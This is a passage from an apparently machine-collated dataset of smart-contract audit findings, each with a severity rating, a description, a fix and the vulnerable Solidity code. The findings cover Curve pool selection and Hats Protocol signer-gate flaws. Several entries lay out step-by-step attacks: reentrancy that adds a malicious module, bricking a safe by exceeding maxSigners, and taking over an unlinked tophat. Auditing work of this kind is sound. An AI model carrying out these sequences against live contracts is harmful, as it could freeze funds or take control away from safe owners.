params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n -Users are forced to use the first pool returned by the Curve RegistryчmediumчIf multiple pools support the exchange, users are forced to use the first pool returned by the Curve Registry. The first pool returned by Curve Registry might not be the most optimal pool to trade with. The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.\\nWhen performing a trade via the `CurveAdapter._exactInSingle` function, it will call the `CURVE_REGISTRY.find_pool_for_coins` function to find the available pools for exchanging two coins.\\n```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n\\nHowever, it was observed that when multiple pools are available, users can choose the pool to return by defining the `i` parameter of the `find_pool_for_coins` function as shown below.\\n```\\n@view\\n@external\\ndef find_pool_for_coins(_from: address, _to: address, i: uint256 = 0) -> address:\\n \"\"\"\\n @notice Find an available pool for exchanging two coins\\n @param _from Address of coin to be sent\\n @param _to Address of coin to be received\\n @param i Index value. When multiple pools are available\\n this value is used to return the n'th address.\\n @return Pool address\\n \"\"\"\\n key: uint256 = bitwise_xor(convert(_from, uint256), convert(_to, uint256))\\n return self.markets[key][i]\\n```\\n\\nHowever, the `CurveAdapter._exactInSingle` did not allow users to define the `i` parameter of the `find_pool_for_coins` function. As a result, users are forced to trade against the first pool returned by the Curve Registry.чIf multiple pools support the exchange, consider allowing the users to choose which pool they want to trade against.\\n```\\nfunction _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n{\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n// Remove the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n// Add the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken, trade.pool_index)); \\n```\\nчThe first pool returned by Curve Registry might not be the most optimal pool to trade with. The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.ч```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n -Signers can bypass checks and change threshold within a transactionчhighчThe `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.чSave the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.чSigners can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.ч```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n -HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCountчhighчThe `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that both functions do not allow that there exist more valid signers than `maxSigners`.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSignatures=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\nчThe `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\nчAs mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.ч```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n -Signers can brick safe by adding unlimited additional signers while avoiding checksчhighчThere are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the safe. However, there is no check to ensure that additional owners are not added to the safe. This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert as long as the new owners are now activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. The check passes, but the new owners are already valid signers. There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.чThere should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.чSigners can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.ч```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n -Other module can add owners to safe that push us above maxSigners, bricking safeчhighчIf another module adds owners to the safe, these additions are not checked by our module or guard's logic. This can result in pushing us over `maxSigners`, which will cause all transactions to revert. In the case of an immutable hat, the only way to avoid the safe being locked permanently (with all funds frozen) may be to convince many hat wearers to renounce their hats.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, if there are other modules on the safe, they are able to add additional owners without these checks.\\nIn the case of `HatsSignerGate.sol`, there is no need to call `claimSigner()` to \"activate\" these owners. They will automatically be valid as long as they are a wearer of the correct hat.\\nThis could lead to an issue where many (more than maxSigners) wearers of an immutable hat are added to the safe as owners. Now, each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert.\\nWorse, there is nothing the admin can do about it. If they don't have control over the eligibility address for the hat, they are not able to burn the hats or transfer them.\\nThe safe will be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.чIf `validSignerCount > maxSigners`, there should be some mechanism to reduce the number of signers rather than reverting.\\nAlternatively, as suggested in another issue, to get rid of all the potential risks of having other modules able to make changes outside of your module's logic, we should create the limit that the HatsSignerGate module can only exist on a safe with no other modules.чThe safe can be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.ч```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n -If another module adds a module, the safe will be brickedчhighчIf a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the \"before\" check uses `enabledModuleCount` and the \"after\" check uses `enabledModuleCount + 1`. The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the \"before\" check would clip off the final modules, and the \"after\" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. This will lead to the \"before\" and \"after\" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible ways to fix this problem will be to have the other module remove the additional one they added. But, depending on the specific circumstances, this option may not be possible. For example, the module that performed the adding may not have the ability to remove modules.чThe module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.чThe safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.ч```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n -Signers can bypass checks to add new modules to a safe by abusing reentrancyчhighчThe `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the has of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Disfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable. It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will passчUse a more typical reentrancy guard format, such as checking to ensure `_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.чAny number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.ч```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n -Unlinked tophat retains linkedTreeRequests, can be ruggedчhighчWhen a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to \"takeover\" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a \"request\" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permissionчIn `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\nчTophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous admin remain through unlinking.ч```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n -Owners can be swapped even though they still wear their signer hatsчmediumч`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n // rest of code\\n```\\nчIssue Owners can be swapped even though they still wear their signer hats\\nPerform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.чbypass restrictions and perform action that should be disallowed.ч```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n // rest of code\\n```\\n -Unbound recursive function call can use unlimited gas and break hats operationчmediumчsome of the functions in the Hats and HatsIdUtilities contracts has recursive logics without limiting the number of iteration, this can cause unlimited gas usage if hat trees has huge depth and it won't be possible to call the contracts functions. functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert and because most of the logics callings those functions so contract would be in broken state for those hats.\\nThis is function `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see this function calls itself recursively to check that if user is wearer of the one of the upper link hats of the hat or not. if the chain(depth) of the hats in the tree become very long then this function would revert because of the gas usage and the gas usage would be high enough so it won't be possible to call this function in a transaction. functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` has similar issues and the gas usage is depend on the tree depth. the issue can happen suddenly for hats if the top level topHat decide to add link, for example:\\nHat1 is linked to chain of the hats that has 1000 \"root hat\" and the topHat (tippy hat) is TIPHat1.\\nHat2 is linked to chain of the hats that has 1000 \"root hat\" and the topHat (tippy hat) is TIPHat2.\\nadmin of the TIPHat1 decides to link it to the Hat2 and all and after performing that the total depth of the tree would increase to 2000 and transactions would cost double time gas.чcode should check and make sure that hat levels has a maximum level and doesn't allow actions when this level breaches. (keep depth of each tophat's tree and update it when actions happens and won't allow actions if they increase depth higher than the threshold)чit won't be possible to perform actions for those hats and funds can be lost because of it.ч```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n -The Hats contract needs to override the ERC1155.balanceOfBatch functionчmediumчThe Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 